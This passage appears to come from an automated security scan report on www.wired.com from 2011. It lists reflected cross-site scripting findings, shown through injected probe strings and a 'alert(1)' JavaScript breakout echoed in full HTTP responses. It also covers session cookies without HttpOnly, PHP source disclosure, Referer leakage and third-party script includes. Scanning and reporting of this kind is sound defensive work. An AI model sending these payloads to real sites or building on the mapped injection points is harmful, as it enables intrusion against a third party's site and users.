Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28631
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Wed, 12 Jan 2011 05:13:12 GMT
Date: Wed, 12 Jan 2011 05:09:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_usere6859"><a>f18010a37e9 ss_registration">
...[SNIP]...

2.16. http://www.wired.com/user/registration [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /user/registration

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6eb8b"><a>e52b868ec54 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user/registration6eb8b"><a>e52b868ec54 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28631
Vary: Accept-Encoding
Expires: Wed, 12 Jan 2011 05:13:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 05:13:15 GMT
Connection: close
Set-Cookie: JSESSIONID=acbOZw9Mr3a9Y7nkgP41s; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_user ss_registration6eb8b"><a>e52b868ec54">
...[SNIP]...

2.17. http://www.wired.com/video/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d31f0"><a>5e756706c49 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /videod31f0"><a>5e756706c49/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28605
Vary: Accept-Encoding
Cache-Control: max-age=292
Expires: Wed, 12 Jan 2011 05:12:52 GMT
Date: Wed, 12 Jan 2011 05:08:00 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_videod31f0"><a>5e756706c49">
...[SNIP]...

2.18. http://www.wired.com/video/search/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/search/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2d05"><a>3d4bdf06559 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /videoc2d05"><a>3d4bdf06559/search/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28622
Vary: Accept-Encoding
Cache-Control: max-age=280
Expires: Wed, 12 Jan 2011 05:12:40 GMT
Date: Wed, 12 Jan 2011 05:08:00 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_videoc2d05"><a>3d4bdf06559 ss_search">
...[SNIP]...

2.19. http://www.wired.com/video/search/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/search/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32a6e"><a>13c7c111330 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/search32a6e"><a>13c7c111330/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private, max-age=276
Expires: Wed, 12 Jan 2011 05:16:48 GMT
Date: Wed, 12 Jan 2011 05:12:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107775


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_search32a6e"><a>13c7c111330">
...[SNIP]...

2.20. http://www.wired.com/video/search/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/search/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b2e3"-alert(1)-"1d49aac262e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/search3b2e3"-alert(1)-"1d49aac262e/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private, max-age=300
Expires: Wed, 12 Jan 2011 05:18:11 GMT
Date: Wed, 12 Jan 2011 05:13:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107866


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<!--

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "search3b2e3"-alert(1)-"1d49aac262e","video"], charmap : {' ' : '+', '-' : '_'}});
//-->
...[SNIP]...

3. Cookie without HttpOnly flag set  previous  next
There are 5 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



3.1. http://www.wired.com/services/corrections/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.wired.com
Path:   /services/corrections/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /services/corrections/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Expires: Wed, 12 Jan 2011 15:41:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 15:41:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=acbAOmv50QXE_5DZY461s; path=/
Content-Length: 54310


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

3.2. http://www.wired.com/services/newsletters  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.wired.com
Path:   /services/newsletters

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /services/newsletters HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Expires: Wed, 12 Jan 2011 15:41:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 15:41:04 GMT
Content-Length: 31938
Connection: close
Set-Cookie: JSESSIONID=acbKlmpgDx9HsdHJY461s; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

3.3. http://www.wired.com/user/login  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.wired.com
Path:   /user/login

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/login HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.0.52 (Red Hat)
Location: https://secure.wired.com/user/login
Content-Length: 73
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Expires: Wed, 12 Jan 2011 05:04:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 05:04:42 GMT
Connection: close
Set-Cookie: JSESSIONID=abcOkB-090FYf89-iN41s; path=/

The URL has moved <a href="https://secure.wired.com/user/login">here</a>

3.4. http://www.wired.com/user/logout  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.wired.com
Path:   /user/logout

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/logout HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.0.52 (Red Hat)
Location: https://secure.wired.com/user/logout
Content-Length: 74
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Expires: Wed, 12 Jan 2011 05:04:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 05:04:46 GMT
Connection: close
Set-Cookie: JSESSIONID=cabyqTOw1aWnFbl3jN41s; path=/

The URL has moved <a href="https://secure.wired.com/user/logout">here</a>

3.5. http://www.wired.com/user/registration  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.wired.com
Path:   /user/registration

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/registration HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.0.52 (Red Hat)
Location: https://secure.wired.com/user/registration
Content-Length: 80
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Expires: Wed, 12 Jan 2011 05:04:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 05:04:58 GMT
Connection: close
Set-Cookie: JSESSIONID=abcPb5WLVvrzQ952mN41s; path=/

The URL has moved <a href="https://secure.wired.com/user/registration">here</a>

4. Source code disclosure  previous  next
There are 3 instances of this issue:

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.


4.1. http://www.wired.com/magazine/  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.wired.com
Path:   /magazine/

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /magazine/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/magazine/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 11:23:30 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Wed, 12 Jan 2011 15:39:00 GMT
Date: Wed, 12 Jan 2011 15:39:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 81454

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
</li>


<?php wp_get_archives('type=postbypost&limit=10'); ?>
</ul>
<?php include (TEMPLATEPATH . "/most_recent_entries_supplement.php"); ?>
   </div>
...[SNIP]...

4.2. http://www.wired.com/magazine/ipad  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.wired.com
Path:   /magazine/ipad

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /magazine/ipad HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 12:28:46 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:47:04 GMT
Date: Wed, 12 Jan 2011 15:39:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 70412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
</li>


<?php wp_get_archives('type=postbypost&limit=10'); ?>
</ul>
<?php include (TEMPLATEPATH . "/most_recent_entries_supplement.php"); ?>
   </div>
...[SNIP]...

4.3. http://www.wired.com/playbook/  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.wired.com
Path:   /playbook/

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /playbook/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:03:45 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=394
Expires: Wed, 12 Jan 2011 15:46:29 GMT
Date: Wed, 12 Jan 2011 15:39:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 134055

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<img src="<?php bloginfo('template_directory'); ?>/images/envelope.gif" width="14" height="11" border="0" />
...[SNIP]...

5. Cross-domain Referer leakage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /js/global.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

Request

GET /js/global.js?1103 HTTP/1.1
Host: www.wired.com
Proxy-Connection: keep-alive
Referer: http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Wed, 12 Jan 2011 15:11:05 GMT
Date: Wed, 12 Jan 2011 15:01:05 GMT
Connection: close
Content-Length: 37327

//mobify include
var _mm = "http://m.wired.com/";

(function() {
if(document.domain.indexOf("howto.wired.com")>=0) {
return;
}
if(document.domain.indexOf("wired.com")>=0) {

...[SNIP]...
)
document.addEventListener("DOMContentLoaded", init, false);

// for Internet Explorer
/*@cc_on @*/
/*@if (@_win32)
document.write("<script id=__ie_onload defer src=//0><\/scr"+"ipt>
...[SNIP]...

6. Cross-domain script include  previous  next
There are 184 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


6.1. http://www.wired.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=105
Expires: Wed, 12 Jan 2011 15:37:32 GMT
Date: Wed, 12 Jan 2011 15:35:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 186750


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<div id="river_list-elsewhere">
<script language="JavaScript" src="http://static.reddit.com/wired.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!-- close shell div -->

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

6.2. http://www.wired.com/about/blogs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /about/blogs

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about/blogs HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:12:36 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=458
Expires: Wed, 12 Jan 2011 15:48:01 GMT
Date: Wed, 12 Jan 2011 15:40:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.3. http://www.wired.com/about/faq/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
